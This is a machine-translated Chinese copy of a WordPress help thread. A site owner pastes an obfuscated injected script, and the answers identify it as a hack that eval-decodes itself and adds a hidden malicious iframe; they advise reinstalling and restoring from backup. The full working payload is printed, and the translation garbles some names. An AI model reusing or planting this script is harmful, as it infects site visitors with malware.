可湿性粉剂网站仅显示主页的Java脚本

时间:2012-06-22 作者:ashes999

我有一个wordpress网站,对于一些用户来说,他们只能看到一个空白页面。事实上,他们只得到某种javascript(见下文)。我已经尝试停用所有插件并更改主题;我仍然得到同样的结果。我没有安装任何压缩插件(如WP缓存或WP超级缓存)。

有什么问题,我该如何解决?

<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-016/7;try{prototype-1;}catch(bawg){e=window["e"+"va"+"l"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,224,327,408,115,216,366,424,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,224,327,408,115,216,366,424,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2-1));}e(s);}}</script>

2 个回复
最合适的回答,由SO网友:EAMann 整理而成

如果您禁用了所有插件,并切换回默认的二十个十(或二十一个十一)主题,并且仍然看到这一点,那么您就有了一个严重的问题。

首先,JavaScript非常混乱。其次,没有插件和默认主题,您应该可以看到WordPress的默认布局。

从表面上看,可能有人入侵了你的网站。

我建议您:

阅读this article 在Codex中,重新安装WordPress更新,我对你链接的JavaScript做了一些反向工程,你已经被黑客攻击了。它是一个压缩脚本,可以解压自身并调用window.eval() 执行其包。

该代码添加了一个隐藏的iframe,用于将内容从坏域加载到您的站点中。我不打算在这里公布黑客的全部细节,但这很糟糕。

除了重新安装WordPress,我还强烈建议您更改all服务器密码:

您可能还想与以下公司合作Sucuri - 他们专门从事恶意软件的保护和删除。

SO网友:Brian Layman

根据你所描述的,黑客可能在索引中。php在html根目录中,或存储在页面中的数据库中,甚至可能作为选项。。你需要找一个知道该找什么的人来清洗。我们很多人都在那个行业。

攻击越来越有创意。我见过的最具创新性的一个添加了一条看起来无害的线条,最后执行了一个选项的内容,该选项包括一个名为Hello Dolly的插件,但包含恶意软件。现在有一些有趣的东西在那里,要找到它们并不总是那么容易。

正如codex的文章所说,清理问题最快、最可靠的方法是删除文件、目录和数据库,并在出现问题之前从备份中恢复。手动清理需要更长的时间,成本更高,而且不太可能发现问题,但如果您没有最近的备份,有时这是唯一可以做的事情。

结束
标签: errors   小码农  

相关推荐

Displaying oEmbed errors?

有时,通过oEmbed嵌入项目是不可能的,例如,当YouTube视频已禁用嵌入时。The oEmbed service will return a 401 Unauthorized, 并且不会转换代码。有没有办法通知用户这一点?当前的工作流是非直观的(至少对我来说),我更喜欢在WordPress页面上,或者更好的是,在编辑器中显示一条消息,说明对象无法嵌入。